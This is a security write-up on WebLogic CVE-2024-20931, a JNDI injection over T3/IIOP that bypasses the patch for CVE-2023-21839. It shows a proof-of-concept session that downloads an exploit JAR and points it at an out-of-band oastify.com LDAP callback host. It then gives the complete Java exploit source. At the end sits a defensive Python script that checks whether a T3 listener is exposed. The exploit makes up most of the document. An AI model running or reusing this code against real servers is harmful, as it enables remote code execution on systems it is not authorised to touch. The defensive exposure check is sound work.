# WebLogic - CVE-2024-20931

**CVE-2024-20931** <mark style="color:red;">**bypasses the patch**</mark> Oracle made for CVE-2023-21839. In other words, this is just another T3/IIOP exploit of WebLogic.

Project is based on the findings of [GlassyAmadeus](https://github.com/GlassyAmadeus/CVE-2024-20931/tree/main).

## Proof-of-Concept

### VulnHub 12.2.1.3

```bash
apt :: ~ » docker container ls 
CONTAINER ID   IMAGE                      COMMAND                  CREATED      STATUS             PORTS                                                                                  NAMES
4c1bbd132119   vulhub/weblogic:12.2.1.3   "/u01/oracle/createA…"   2 days ago   Up About an hour   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   weblogic-vulnhub-12213
```

```bash
[oracle@weblogic-vulnhub-12213 exp]$ curl -OL https://github.com/0xPThree/WebLogic/raw/refs/heads/main/cve-2024-20931/CVE-2024-20931.jar
[oracle@weblogic-vulnhub-12213 exp]$ java -jar CVE-2024-20931.jar
Please input target IP:127.0.0.1
Please input target port:7001
Please input RMI Address(ip:port/exp):4diumyg78d3drm2y405khl71xs3jraky9.oastify.com
```

<figure><img src="/files/N5aWoMaCSsj9C8MSQGL6" alt=""><figcaption><p>Burp Collaborator callback indicating a successful exploit attempt</p></figcaption></figure>

## Source code

```java
// MainClass.java
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Scanner;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;

public class MainClass {
  public static void main(String[] args) throws NamingException, NoSuchFieldException, SecurityException, IllegalArgumentException, IllegalAccessException {
    String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    Scanner scanner = new Scanner(System.in);
    System.out.print("Please input target IP:");
    String tIp = scanner.nextLine();
    System.out.print("Please input target port:");
    String tPort = scanner.nextLine();
    String url = "t3://" + tIp + ":" + tPort;
    Hashtable<Object, Object> env1 = new Hashtable<>();
    env1.put("java.naming.factory.initial", JNDI_FACTORY);
    env1.put("java.naming.provider.url", url);
    InitialContext c = new InitialContext(env1);
    Hashtable<Object, Object> env2 = new Hashtable<>();
    System.out.print("Please input RMI Address(ip:port/exp):");
    String exp = scanner.nextLine();
    env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
    env2.put("datasource", "ldap://" + exp);
    ForeignOpaqueReference f = new ForeignOpaqueReference();
    Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
    jndiEnvironment.setAccessible(true);
    jndiEnvironment.set(f, env2);
    Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
    remoteJNDIName.setAccessible(true);
    String ldap = "ldap://" + exp;
    remoteJNDIName.set(f, ldap);
    c.rebind("glassy", f);
    try {
      c.lookup("glassy");
    } catch (Exception exception) {}
  }
}
```

```
// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Created-By: Maven JAR Plugin 3.3.0
Build-Jdk-Spec: 11
Main-Class: MainClass
```
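Added defensive check, not part of the original project: since the bug is only reachable over T3/IIOP, the usual compensating control is to keep those listeners off untrusted networks (for example with a WebLogic connection filter denying t3/t3s), and this script verifies from the network whether a listener still answers the T3 handshake. Host and port are supplied by the operator; the HELO banner quoted in the comments is a constructed sample.

```python
import re
import socket

# First message a T3 client sends; a served T3 endpoint replies with a HELO banner.
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# Constructed sample reply: b"HELO:12.2.1.3.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"
# Only the release version is extracted; the trailing boolean is not interpreted.
HELO_RE = re.compile(rb"^HELO:(?P<version>\d+(?:\.\d+)*)\.(?:true|false)")


def parse_t3_banner(banner: bytes):
    """Return the WebLogic release from a T3 HELO banner, or None if it is not T3."""
    m = HELO_RE.match(banner)
    return None if m is None else m.group("version").decode()


def check_t3_exposure(host: str, port: int = 7001, timeout: float = 5.0) -> dict:
    """Send the T3 hello to host:port and report whether the listener serves T3.

    A closed or filtered port and a non-T3 reply (e.g. an HTTP error page)
    both count as 'not exposed'; only a HELO banner counts as exposed.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(T3_HELLO)
            banner = s.recv(256)
    except OSError as err:
        return {"host": host, "port": port, "t3": False, "reason": str(err)}
    version = parse_t3_banner(banner)
    if version is None:
        return {"host": host, "port": port, "t3": False,
                "reason": "non-T3 reply: " + banner[:40].decode("latin-1")}
    return {"host": host, "port": port, "t3": True, "version": version}


def verdict(result: dict) -> str:
    """One-line finding for a report; T3 still reachable means this bug class is reachable."""
    where = f"{result['host']}:{result['port']}"
    if not result["t3"]:
        return f"{where} does not serve T3 ({result['reason']})"
    return (f"{where} serves T3 (WebLogic {result['version']}): "
            "restrict the listener to trusted hosts and confirm the CPU patch level")


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 7001
    print(verdict(check_t3_exposure(host, port)))
```

The banner reports the product release only, not the PSU level, so it cannot tell a patched 12.2.1.3 from an unpatched one; use it for exposure inventory and check patch state on the host itself.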
